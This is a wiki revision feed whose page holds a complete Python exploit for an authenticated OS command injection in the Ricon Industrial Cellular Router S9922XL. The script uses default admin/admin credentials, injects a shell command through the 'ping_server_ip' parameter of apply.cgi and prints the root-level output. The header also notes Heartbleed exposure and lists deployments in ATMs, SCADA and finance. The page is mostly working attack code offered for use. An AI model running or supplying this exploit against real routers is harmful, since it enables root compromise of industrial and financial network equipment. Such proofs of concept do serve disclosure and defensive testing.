https://pwnwiki.com/index.php?action=history&feed=atom&title=Ricon_Industrial_Cellular_Router_S9922XL_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E 2026-04-17T01:57:23Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Ricon_Industrial_Cellular_Router_S9922XL_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=6423&oldid=prev 2021-07-07T02:45:06Z

<p>Created page with &quot;&lt;pre&gt; # Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE) # Date: 02.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://ww...&quot;</p> <p><b>New page</b></p><div>&lt;pre&gt;<br /> # Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE) <br /> # Date: 02.07.2021<br /> # Exploit Author: LiquidWorm<br /> # Vendor Homepage: https://www.riconmobile.com<br /> <br /> <br /> #!/usr/bin/env python3<br /> # -*- coding: utf-8 -*-<br /> #<br /> #<br /> # Ricon Industrial Cellular Router S9922XL Remote Command Execution<br /> #<br /> #<br /> # Vendor: Ricon Mobile Inc.<br /> # Product web page: https://www.riconmobile.com<br /> # Affected version: Model: S9922XL and S9922L<br /> # Firmware: 16.10.3<br /> #<br /> # Summary: S9922L series LTE router is designed and manufactured by<br /> # Ricon Mobile Inc., it based on 3G/LTE cellular network technology<br /> # with industrial class quality. With its embedded cellular module,<br /> # it widely used in multiple case like ATM connection, remote office<br /> # security connection, data collection, etc.<br /> #<br /> # The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi<br /> # and VPN technologies. Powerful 64-bit Processor and integrated real-time<br /> # operating system specially developed by Ricon Mobile. S9922XL is<br /> # widely used in many areas such as intelligent transportation, scada,<br /> # POS, industrial automation, telemetry, finance, environmental protection.<br /> #<br /> # Desc: The router suffers from an authenticated OS command injection<br /> # vulnerability. This can be exploited to inject and execute arbitrary<br /> # shell commands as the admin (root) user via the 'ping_server_ip' POST<br /> # parameter. Also vulnerable to Heartbleed.<br /> #<br /> # --------------------------------------------------------------------<br /> # C:\&gt;python ricon.py 192.168.1.71 id<br /> # uid=0(admin) gid=0(admin)<br /> # --------------------------------------------------------------------<br /> #<br /> # Tested on: GNU/Linux 2.6.36 (mips)<br /> # WEB-ROUTER<br /> #<br /> #<br /> # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> # @zeroscience<br /> #<br /> #<br /> # Advisory ID: ZSL-2021-5653<br /> # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php<br /> #<br /> #<br /> # 02.07.2021<br /> #<br /> <br /> import requests,sys,re<br /> <br /> if len(sys.argv)&lt;3:<br /> print(&quot;Ricon Industrial Routers RCE&quot;)<br /> print(&quot;Usage: ./ricon.py [ip] [cmd]&quot;)<br /> sys.exit(17)<br /> else:<br /> ipaddr=sys.argv[1]<br /> execmd=sys.argv[2]<br /> <br /> data={'submit_class' :'admin',<br /> 'submit_button' :'netTest',<br /> 'submit_type' :'',<br /> 'action' :'Apply',<br /> 'change_action' :'',<br /> 'is_ping' :'0',<br /> 'ping_server_ip':';'+execmd}<br /> <br /> htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))<br /> htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))<br /> reout=re.search(&quot;20\&quot;&gt;(.*)&lt;/textarea&gt;&quot;,htreq.text,flags=re.S).group(1).strip('\n')<br /> print(reout)<br /> <br /> &lt;/pre&gt;</div>

Pwnwiki